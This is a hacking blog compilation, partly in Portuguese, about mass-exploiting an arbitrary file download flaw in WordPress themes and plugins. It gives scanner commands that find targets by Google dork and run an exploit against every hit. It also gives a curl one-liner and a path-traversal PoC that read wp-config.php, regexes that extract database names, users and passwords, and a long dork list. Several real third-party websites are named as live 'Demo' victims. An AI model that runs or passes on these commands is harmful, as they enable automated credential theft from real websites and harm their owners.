php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'



[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR



[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution


[TUTORIAL] - Getting access to the Wordpress panel


REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

domingo, 18 de janeiro de 2015

Arbitrary File Download vulnerability no tema Bretheon do wordpress


Arbitrary File Download vulnerability o que eu chamo de A.F.D.
Foi encontrada tal falha no tema Bretheon do wordpress.
--------------------------------------------------------------------------------------------------------------
DETALHES Acesso: http://1337day.com/exploit/23140 Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability Date: 17/01/2014 Exploit Author: MindCracker - Team MaDLeeTs Contact : Md5@live.com.pk - Maddy@live.com.pk| https://twitter.com/MindCrackerKhan  Tested on: Linux / Window  Google Dork: inurl:wp-content/themes/bretheon/ Demo  http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php   PoC  http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


DETALHES
Acesso: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan 
Tested on: Linux / Window

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------

Como tal falha no tema não usa nada de novo e o caminho padrão "admin-ajax.php?action=revslider_show_image&img="  nosso exploit desenvolvido meses atrás já faz tal verificação e pode ser usado tranquilamente.
--------------------------------------------------------------------------------------------------------------

[TUTORIAL]: 

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETALHES:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------

sexta-feira, 2 de janeiro de 2015

Wordpress A.F.D Verification/ INURL - BRASIL - WORDPRESS THEMES DOWNLOAD.PHP FILE DISCLOSURE


Multiple WordPress themes suffer from an arbitrary file download vulnerability in download.php. These include Ultimatum, Medicate, Centum, Avada, Striking Theme & E-Commerce, cuckootap, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Trinity, Lote27, and Revslider themes.

Multiple WordPress themes suffer from an arbitrary file download vulnerability in download.php. These include Ultimatum, Medicate, Centum, Avada, Striking Theme & E-Commerce, cuckootap, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Trinity, Lote27, and Revslider themes.


------------------------------------------------------------------------------
# *NAME*:               Wordpress A.F.D Verification/ INURL - BRASIL
# *TIPE*:                   Arbitrary File Download
# *Tested on*:            Linux
# *EXECUTE*:         php exploit.php www.target.gov.us
# *OUTPUT*:           WORDPRES_A_F_D.txt
# *AUTOR*:             GoogleINURL
# *EMAIL*:              [email protected]
# *Blog*:                   http://blog.inurl.com.br
# *Twitter*:               https://twitter.com/googleinurl
# *Fanpage*:             https://fb.com/InurlBrasil
# *GIT: *                   https://github.com/googleinurl
# *YOUTUBE  *       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
#
------------------------------------------------------------------------------
#  Comand Exec Scanner INURLBR:
#
# ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
#
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#
------------------------------------------------------------------------------

Description:

This exploit allows the attacker to exploit the flaw Arbitrary File
Download in dozens of wordpress themes.
Through regular expressions, the script will perform the check for each
target url checking your wp-config.php file
Regular expressions:
preg_match_all("(DB_NAME.*')", $body, $status['DB_NAME']);
preg_match_all("(DB_USER.*')", $body, $status['DB_USER']);
preg_match_all("(DB_PASSWORD.*')", $body, $status['DB_PASSWORD']);
preg_match_all("(DB_HOST.*')", $body, $status['DB_HOST']);
preg_match_all("(DB_CHARSET.*')", $body, $status['DB_CHARSET']);

*D O R K'S:

WordPress Ultimatum Theme Arbitrary File Download
Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s


WordPress Centum Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
Google Dork:: "Index of" & /wp-content/themes/Centum/

WordPress Avada Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
Google Dork:: "Index of" & /wp-content/themes/Avada/

WordPress Striking Theme & E-Commerce Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
Google Dork:: "Index of" & /wp-content/themes/striking_r/

WordPress Beach Apollo Arbitrary File Download
Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
Google Dork:: "Index of" & /wp-content/themes/beach_apollo/

Dork Google: inurl:ajax-store-locator
index of ajax-store-locator
Vendor Homepage::
http://codecanyon.net/item/ajax-store-locator-wordpress/5293356

WordPress cuckootap Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/cuckootap/
Vendor Homepage:: http://www.cuckoothemes.com/

WordPress IncredibleWP Theme Arbitrary File Download
Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/

WordPress Ultimatum Theme Arbitrary File Download
Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
Google Dork:: "Index of" & /wp-content/themes/ultimatum

WordPress Medicate Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
Google Dork:: "Index of" & /wp-content/themes/medicate/


WordPress Centum Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
Google Dork:: "Index of" & /wp-content/themes/Centum/

WordPress Avada Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
Google Dork:: "Index of" & /wp-content/themes/Avada/

WordPress Striking Theme & E-Commerce Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
Google Dork:: "Index of" & /wp-content/themes/striking_r/

WordPress Beach Apollo Arbitrary File Download
Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
Google Dork:: "Index of" & /wp-content/themes/beach_apollo/

WordPress Trinity Theme Arbitrary File Download
Vendor Homepage:: https://churchthemes.net/themes/trinity/
Google Dork:: "Index of" & /wp-content/themes/trinity/

WordPress Lote27 Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/lote27/

WordPress Revslider Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
Google Dork:: wp-admin & inurl:revslider_show_image




Exploit::
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html